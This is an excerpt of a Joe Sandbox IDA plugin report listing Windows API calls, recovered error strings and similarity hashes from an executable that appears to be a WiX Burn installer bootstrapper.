                                                                                                                                                                    • Opcode ID: 495ba3695cb5f0aaae26b28b0f2277a97275695ff8690cde31495cd5deaa1d33
                                                                                                                                                                    • Instruction ID: 1db98aee832bcefdc7ec98e313b4a456cf824ed3cf2bc9bad824c13115251127
                                                                                                                                                                    • Opcode Fuzzy Hash: 495ba3695cb5f0aaae26b28b0f2277a97275695ff8690cde31495cd5deaa1d33
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41A075E05219BBCB119B94CD84FADB778EF46725F2042A4EA50AB1D0C7319E00DB51
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadBitmapW.USER32(?,00000001), ref: 0091E2E5
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E2F1
                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0091E338
                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0091E359
                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0091E36B
                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 0091E381
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                                    • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                                    • API String ID: 2342928100-598475503
                                                                                                                                                                    • Opcode ID: 5f98120171c245a1957472388bd7d6e65e3157efefd2dd0517904795e56794a1
                                                                                                                                                                    • Instruction ID: 85199e017f723e61440025b80f496125da9b4b84001edb92ca94c0f37c9ea72f
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f98120171c245a1957472388bd7d6e65e3157efefd2dd0517904795e56794a1
                                                                                                                                                                    • Instruction Fuzzy Hash: EF316075A00219AFDB10CFB9D949A9EBBF4EF08710F148119FD14EB284EB70E901CBA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0094B500), ref: 009150D3
                                                                                                                                                                    • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00915171
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0091518A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseCurrentHandle
                                                                                                                                                                    • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 009068AC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009068B3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009068BD
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906929
                                                                                                                                                                    • variable.cpp, xrefs: 009068E1
                                                                                                                                                                    • DllGetVersion, xrefs: 0090689E
                                                                                                                                                                    • msi, xrefs: 009068A3
                                                                                                                                                                    • Failed to find DllGetVersion entry point in msi.dll., xrefs: 009068EB
                                                                                                                                                                    • Failed to get msi.dll version info., xrefs: 00906905
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                    • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?), ref: 0090D6DA
                                                                                                                                                                    • GetLastError.KERNEL32(?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?,?), ref: 0090D6E7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0090D71F
                                                                                                                                                                    • GetLastError.KERNEL32(?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?,?), ref: 0090D72B
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                    • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901186
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901191
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0090119F
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011BA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009011C2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011D7
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F64E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F7C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set download user., xrefs: 0091F751
                                                                                                                                                                    • UX requested unknown payload with id: %ls, xrefs: 0091F6A3
                                                                                                                                                                    • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0091F6B9
                                                                                                                                                                    • UX did not provide container or payload id., xrefs: 0091F7B8
                                                                                                                                                                    • Failed to set download password., xrefs: 0091F777
                                                                                                                                                                    • UX requested unknown container with id: %ls, xrefs: 0091F6F3
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F668
                                                                                                                                                                    • Failed to set download URL., xrefs: 0091F728
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00945A9B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945AA9
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00945AEA
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945AF7
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00945C6A
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00945C79
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                    • String ID: GET$dlutil.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00911020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00910C6F,?,00000000,?,00000000,00000000), ref: 0091104F
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00910DF3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00910E00
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create syncpoint event., xrefs: 00910E2E
                                                                                                                                                                    • Failed to append payload cache action., xrefs: 00910DAA
                                                                                                                                                                    • Failed to append rollback cache action., xrefs: 00910CCF
                                                                                                                                                                    • plan.cpp, xrefs: 00910E24
                                                                                                                                                                    • Failed to append cache action., xrefs: 00910D4A
                                                                                                                                                                    • Failed to append package start action., xrefs: 00910C95
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                    • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                    • API String ID: 801187047-2489563283
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 00946F55
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946FA0
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094701C
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947068
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Compare
                                                                                                                                                                    • String ID: `<u$type$url
                                                                                                                                                                    • API String ID: 1324494773-1686489133
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0094B500,00000000,?), ref: 009106D3
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0094B500,00000000,?), ref: 009106E2
                                                                                                                                                                      • Part of subcall function 00940BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0091061A,?,00000000,00020006), ref: 00940C0E
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 009105AC
                                                                                                                                                                    • Failed to delete registration key: %ls, xrefs: 00910681
                                                                                                                                                                    • Failed to update resume mode., xrefs: 009106B7
                                                                                                                                                                    • Failed to open registration key., xrefs: 0091071A
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 009105F0
                                                                                                                                                                    • Failed to write volatile reboot required registry key., xrefs: 0091061E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Create
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                                                                    • API String ID: 359002179-3398658923
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090F48A
                                                                                                                                                                      • Part of subcall function 00904115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?), ref: 00904123
                                                                                                                                                                      • Part of subcall function 00904115: GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 00904131
                                                                                                                                                                    • lstrlenA.KERNEL32(0094B500,00000000,00000094,00000000,00000094,?,?,009104BF,swidtag,00000094,?,0094B518,009104BF,00000000,?,00000000), ref: 0090F4DD
                                                                                                                                                                      • Part of subcall function 00944DB3: CreateFileW.KERNEL32(0094B500,40000000,00000001,00000000,00000002,00000080,00000000,009104BF,00000000,?,0090F4F4,?,00000080,0094B500,00000000), ref: 00944DCB
                                                                                                                                                                      • Part of subcall function 00944DB3: GetLastError.KERNEL32(?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094,?,?,?,?,?,00000000), ref: 00944DD8
                                                                                                                                                                    Strings
                                                                                                                                                                    • swidtag, xrefs: 0090F49D
                                                                                                                                                                    • Failed to write tag xml to file: %ls, xrefs: 0090F51B
                                                                                                                                                                    • Failed to format tag folder path., xrefs: 0090F543
                                                                                                                                                                    • Failed to create regid folder: %ls, xrefs: 0090F525
                                                                                                                                                                    • Failed to allocate regid file path., xrefs: 0090F535
                                                                                                                                                                    • Failed to allocate regid folder path., xrefs: 0090F53C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                                                    • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                                                                    • API String ID: 904508749-1201533908
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0090548E,00000000,00000000,?,00000000), ref: 0091548B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00904C61,?,?,00000000,?,?,?,?,?,?,0094B4A0,?,?), ref: 00915496
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to wait for child process exit., xrefs: 009154C4
                                                                                                                                                                    • Failed to post terminate message to child process., xrefs: 00915476
                                                                                                                                                                    • Failed to write restart to message buffer., xrefs: 0091542E
                                                                                                                                                                    • Failed to write exit code to message buffer., xrefs: 00915406
                                                                                                                                                                    • Failed to post terminate message to child process cache thread., xrefs: 0091545A
                                                                                                                                                                    • pipe.cpp, xrefs: 009154BA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                    • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                    • API String ID: 1211598281-2161881128
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00919F04,00000003,000007D0,00000003,?,000007D0), ref: 009190B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 009190BF
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00919187
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify hash of payload: %ls, xrefs: 00919172
                                                                                                                                                                    • Failed to verify catalog signature of payload: %ls, xrefs: 0091914E
                                                                                                                                                                    • cache.cpp, xrefs: 009190F6
                                                                                                                                                                    • Failed to open payload at path: %ls, xrefs: 00919103
                                                                                                                                                                    • Failed to verify signature of payload: %ls, xrefs: 0091912F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                    • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00906B69
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906B73
                                                                                                                                                                    • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00906BB7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906BC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                    • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909C88
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0090A895,00000100,000002C0,000002C0,?,000002C0), ref: 00909CA0
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00909CAB
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909C93
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909CFD
                                                                                                                                                                    • search.cpp, xrefs: 00909CDB
                                                                                                                                                                    • Failed get to file attributes. '%ls', xrefs: 00909CE8
                                                                                                                                                                    • Failed to set variable., xrefs: 00909D2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 0091AD57
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091AD61
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0091ADA0
                                                                                                                                                                    • CoUninitialize.OLE32(?,0091C721,?,?), ref: 0091ADDD
                                                                                                                                                                    Strings
                                                                                                                                                                    • elevation.cpp, xrefs: 0091AD85
                                                                                                                                                                    • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0091AD8F
                                                                                                                                                                    • Failed to initialize COM., xrefs: 0091ADAC
                                                                                                                                                                    • Failed to pump messages in child process., xrefs: 0091ADCB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                    • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00905D68
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0092A33E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0092A348
                                                                                                                                                                    Strings
                                                                                                                                                                    • :, xrefs: 0092A3C1
                                                                                                                                                                    • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0092A377
                                                                                                                                                                    • download, xrefs: 0092A308
                                                                                                                                                                    • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0092A425
                                                                                                                                                                    • apply.cpp, xrefs: 0092A36C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                                                                                    • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                    • API String ID: 1799206407-1905830404
                                                                                                                                                                    APIs
